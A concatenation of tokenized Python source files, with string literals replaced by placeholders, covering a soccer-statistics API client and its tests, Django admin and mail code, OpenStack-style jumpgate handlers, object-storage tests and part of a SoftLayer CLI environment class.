<EOL> class DummyRequests ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response = { } ) : <EOL> self . response = response <EOL> def get ( self , * args , ** kwargs ) : <EOL> return DummyResponse ( self . response ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> return DummyResponse ( self . response ) </s>
<s> import sys <EOL> from soccermetrics . rest import SoccermetricsRestClient <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> client = SoccermetricsRestClient ( ) <EOL> if len ( sys . argv ) != <NUM_LIT:3> : <EOL> sys . stderr . write ( "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> matchday_start = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> matchday_end = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> for day in range ( matchday_start , matchday_end + <NUM_LIT:1> ) : <EOL> matches = client . club . information . get ( matchday = day , <EOL> sort = '<STR_LIT>' ) . all ( ) <EOL> for match in matches : <EOL> print "<STR_LIT>" % ( match . matchday , <EOL> match . matchDate , match . kickoffTime , match . homeTeamName , <EOL> match . awayTeamName , match . venueName , match . refereeName ) <EOL> print </s>
<s> import unittest <EOL> from soccermetrics . rest import SoccermetricsRestClient <EOL> class ClientEndpointTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . client = SoccermetricsRestClient ( account = "<STR_LIT>" , api_key = "<STR_LIT>" ) <EOL> def test_service_root ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . root . endpoint , "<STR_LIT>" ) <EOL> def test_validation_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . validation . phases . endpoint , "<STR_LIT>" ) <EOL> self . assertEqual ( self . client . validation . groupRounds . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . knockoutRounds . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . confederations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . countries . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . competitions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . domesticCompetitions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . intlCompetitions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . seasons . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . teams . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . venues . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . timezones . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . nameOrder . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . persons . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . positions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . fouls . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . cards . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . bodyparts . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . shotevents . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . penaltyOutcomes . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . actions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . modifiers . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . modifierCategories . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . weather . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . validation . surfaces . endpoint , '<STR_LIT>' ) <EOL> def test_personnel_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . players . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . managers . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . referees . endpoint , '<STR_LIT>' ) <EOL> def test_club_match_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . club . information . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . lineups . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . conditions . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . goals . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . penalties . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . offenses . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . substitutions . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . shootouts . EndpointURI ( ) , '<STR_LIT>' ) <EOL> def test_national_team_match_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . natl . information . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . lineups . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . conditions . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . goals . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . penalties . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . offenses . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . substitutions . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . shootouts . EndpointURI ( ) , '<STR_LIT>' ) <EOL> def test_club_events_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . club . events . all . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . events . touches . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . events . actions . endpoint , '<STR_LIT>' ) <EOL> def test_natl_events_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . natl . events . all . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . events . touches . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . events . actions . endpoint , '<STR_LIT>' ) <EOL> def test_club_statistics_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . club . stats . crosses . corners . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . crosses . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . defense . actions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . defense . blocks . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . defense . clearances . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . defense . goalline . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . defense . tackles . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . fouls . cards . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . fouls . wins . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goals . assists . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goals . bodyparts . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goals . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goals . penalties . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goals . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goalkeeper . actions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goalkeeper . goals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goalkeeper . shots . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . goalkeeper . saves . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . passes . directions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . passes . lengths . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . passes . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . passes . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . setpieces . corners . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . setpieces . freekicks . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . setpieces . throwins . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . shots . bodyparts . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . shots . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . shots . plays . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . shots . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . touches . duels . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . touches . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . club . stats . touches . totals . endpoint , '<STR_LIT>' ) <EOL> def test_natl_statistics_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . natl . stats . crosses . corners . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . crosses . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . defense . actions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . defense . blocks . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . defense . clearances . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . defense . goalline . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . defense . tackles . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . fouls . cards . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . fouls . wins . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goals . assists . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goals . bodyparts . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goals . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goals . penalties . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goals . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goalkeeper . actions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goalkeeper . goals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goalkeeper . shots . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . goalkeeper . saves . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . passes . directions . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . passes . lengths . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . passes . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . passes . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . setpieces . corners . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . setpieces . freekicks . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . setpieces . throwins . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . shots . bodyparts . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . shots . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . shots . plays . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . shots . totals . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . touches . duels . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . touches . locations . endpoint , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . natl . stats . touches . totals . endpoint , '<STR_LIT>' ) <EOL> def test_analytics_endpoints ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . analytics . state . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . analytics . segment . EndpointURI ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( self . client . analytics . tsr . EndpointURI ( ) , '<STR_LIT>' ) </s>
<s> from django . contrib import admin <EOL> from django . core . mail import get_connection <EOL> from . models import Member <EOL> from . . storage . models import Package <EOL> class PackageInline ( admin . TabularInline ) : <EOL> model = Package <EOL> max_num = <NUM_LIT:1> <EOL> class MemberAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( <EOL> '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> search_fields = ( '<STR_LIT:id>' , '<STR_LIT:email>' , ) <EOL> actions = [ '<STR_LIT>' ] <EOL> actions_on_bottom = True <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> inlines = [ PackageInline , ] <EOL> def resend_registration ( self , request , queryset ) : <EOL> connection = get_connection ( ) <EOL> for member in queryset . all ( ) . only ( '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT:id>' ) : <EOL> member . send_registration_confirmation ( <EOL> reset_key = True , connection = connection ) <EOL> admin . site . register ( Member , MemberAdmin ) </s>
<s> from django . conf import settings <EOL> from django . core . mail import EmailMultiAlternatives <EOL> from django . template . loader import render_to_string <EOL> def send_custom_mail ( subject , to , template , context , connection = None ) : <EOL> context . update ( { '<STR_LIT>' : settings . SITE_URL } ) <EOL> text_content = render_to_string ( '<STR_LIT>' % template , context ) <EOL> html_content = render_to_string ( '<STR_LIT>' % template , context ) <EOL> msg = EmailMultiAlternatives ( <EOL> subject , <EOL> text_content , <EOL> settings . FROM_EMAIL , <EOL> [ to ] , <EOL> connection = connection ) <EOL> msg . attach_alternative ( html_content , "<STR_LIT>" ) <EOL> msg . send ( ) </s>
<s> from pims . api import * <EOL> from . _version import get_versions <EOL> __version__ = get_versions ( ) [ '<STR_LIT:version>' ] <EOL> del get_versions </s>
<s> def add_endpoints ( disp ) : <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> disp . add_endpoint ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) </s>
<s> from jumpgate . common import error_handling <EOL> EXTENSIONS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> } , <EOL> } <EOL> class ExtensionsV2 ( object ) : <EOL> def on_get ( self , req , resp , tenant_id ) : <EOL> resp . body = { '<STR_LIT>' : EXTENSIONS . values ( ) } <EOL> class ExtensionV2 ( object ) : <EOL> def on_get ( self , req , resp , tenant_id , alias ) : <EOL> if alias not in EXTENSIONS : <EOL> return error_handling . not_found ( <EOL> resp , '<STR_LIT>' ) <EOL> resp . body = { '<STR_LIT>' : EXTENSIONS [ alias ] } </s>
<s> import falcon <EOL> class Versions ( object ) : <EOL> def __init__ ( self , disp ) : <EOL> self . disp = disp <EOL> def on_get ( self , req , resp ) : <EOL> resp . status = falcon . HTTP_300 <EOL> resp . body = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : self . disp . get_endpoint_url ( <EOL> req , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : self . disp . get_endpoint_url ( <EOL> req , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> } <EOL> } </s>
<s> from mock import MagicMock , patch <EOL> from jumpgate . compute . drivers . sl . availability_zones import ( <EOL> AvailabilityZonesV2 ) <EOL> import unittest <EOL> class TestAvailabilityZonesV2 ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . req , self . resp = MagicMock ( ) , MagicMock ( ) <EOL> self . tenant_id = '<STR_LIT>' <EOL> self . instance = AvailabilityZonesV2 ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_on_get ( self , mockOptions ) : <EOL> mockOptions . return_value = { <EOL> '<STR_LIT>' : <EOL> [ { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } } ] } <EOL> self . instance . on_get ( self . req , self . resp , self . tenant_id ) <EOL> self . assertEquals ( list ( self . resp . body . keys ( ) ) , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( self . resp . body [ '<STR_LIT>' ] , <EOL> [ { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . assertEquals ( self . resp . status , <NUM_LIT:200> ) <EOL> def tearDown ( self ) : <EOL> self . req , self . resp , self . app = None , None , None </s>
<s> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from mock import Mock <EOL> from object_storage . storage_object import StorageObject <EOL> class ClientTest ( unittest . TestCase ) : <EOL> def test_instance_setup ( self ) : <EOL> self . assert_ ( self . client == self . obj . client , "<STR_LIT>" ) <EOL> self . assert_ ( self . obj . container == '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . assert_ ( self . obj . name == '<STR_LIT>' , "<STR_LIT>" ) <EOL> def test_create ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . create ( ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_create_w_headers ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . create ( headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_update ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . make_request = _make_request <EOL> self . obj . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( <EOL> self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_delete ( self ) : <EOL> self . client . delete ( ) <EOL> self . client . delete_object . called_once_with ( self . obj . container , <EOL> self . obj . name , <EOL> headers = None ) <EOL> def test_read ( self ) : <EOL> _result = Mock ( ) <EOL> self . obj . make_request = Mock ( return_value = _result ) <EOL> self . obj . read ( ) <EOL> self . obj . make_request . called_once_with ( '<STR_LIT:GET>' ) <EOL> def test_read_with_offsets ( self ) : <EOL> _result = Mock ( ) <EOL> self . obj . make_request = Mock ( return_value = _result ) <EOL> self . obj . read ( size = <NUM_LIT> , offset = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( size = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( size = - <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . obj . read ( offset = <NUM_LIT> ) <EOL> self . assertEqual ( self . obj . make_request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_copy_to ( self ) : <EOL> _make_request = Mock ( ) <EOL> self . obj . _make_request = _make_request <EOL> self . obj . _headers = Mock ( return_value = { } ) <EOL> other_obj = Mock ( ) <EOL> self . obj . copy_to ( other_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . _headers . called_once_with ( ) <EOL> h = { '<STR_LIT>' : other_obj . path , '<STR_LIT>' : <NUM_LIT:0> } <EOL> _make_request . called_once_with ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> headers = h , <EOL> data = '<STR_LIT>' , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> def test_object_is_dir ( self ) : <EOL> dir_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . client , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> legacy_dir_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . client , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> file_object = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , <EOL> client = self . client , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( dir_object . is_dir ( ) ) <EOL> self . assertTrue ( legacy_dir_object . is_dir ( ) ) <EOL> self . assertFalse ( file_object . is_dir ( ) ) <EOL> def test_rename ( self ) : <EOL> self . obj . copy_to = Mock ( ) <EOL> self . obj . delete = Mock ( ) <EOL> _new_obj = Mock ( ) <EOL> self . obj . rename ( _new_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . copy_to . called_once_with ( _new_obj , <NUM_LIT:1> , <NUM_LIT:2> , a1 = <NUM_LIT:1> , a2 = <NUM_LIT:2> ) <EOL> self . obj . delete . called_once_with ( ) <EOL> def setUp ( self ) : <EOL> self . client = Mock ( ) <EOL> self . obj = StorageObject ( '<STR_LIT>' , '<STR_LIT>' , client = self . client ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import importlib <EOL> import click <EOL> import pkg_resources <EOL> import SoftLayer <EOL> from SoftLayer . CLI import formatting <EOL> from SoftLayer . CLI import routes <EOL> class Environment ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . commands = { } <EOL> self . aliases = { } <EOL> self . vars = { } <EOL> self . client = None <EOL> self . format = '<STR_LIT>' <EOL> self . skip_confirmations = False <EOL> self . config_file = None <EOL> self . _modules_loaded = False <EOL> def out ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> click . echo ( output , nl = newline ) <EOL> def err ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> click . echo ( output , nl = newline , err = True ) <EOL> def fmt ( self , output ) : <EOL> """<STR_LIT>""" <EOL> return formatting . format_output ( output , fmt = self . format ) <EOL> def fout ( self , output , newline = True ) : <EOL> """<STR_LIT>""" <EOL> if output is not None : <EOL> self . out ( self . fmt ( output ) , newline = newline ) <EOL> def input ( self , prompt , default = None , show_default = True ) : <EOL> """<STR_LIT>""" <EOL> return click . prompt ( prompt , default = default , show_default = show_default ) <EOL> def getpass ( self , prompt , default = None ) : <EOL> """<STR_LIT>""" <EOL> return click . prompt ( prompt , hide_input = True , default = default ) <EOL> def list_commands ( self , * path ) : <EOL> """<STR_LIT>""" <EOL> path_str = '<STR_LIT::>' . join ( path ) <EOL> commands = [ ] <EOL> for command in self . commands . keys ( ) : <EOL> if all ( [ command . startswith ( path_str ) , <EOL> len ( path ) == command . count ( "<STR_LIT::>" ) ] ) : <EOL> offset = len ( path_str ) + <NUM_LIT:1> if path_str else <NUM_LIT:0> <EOL> commands . append ( command [ offset : ] ) <EOL> return sorted ( commands ) <EOL> def get_command ( self , * path ) : <EOL> """<STR_LIT>""" <EOL> path_str = '<STR_LIT::>' . join ( path ) <EOL> if path_str in self . commands : <EOL> return self . commands [ path_str ] . load ( ) <EOL> return None <EOL> def resolve_alias ( self , path_str ) : <EOL> """<STR_LIT>""" <EOL> if path_str in self . aliases : <EOL> return self . aliases [ path_str ] <EOL> return path_str <EOL> def load ( self ) : <EOL> """<STR_LIT>""" 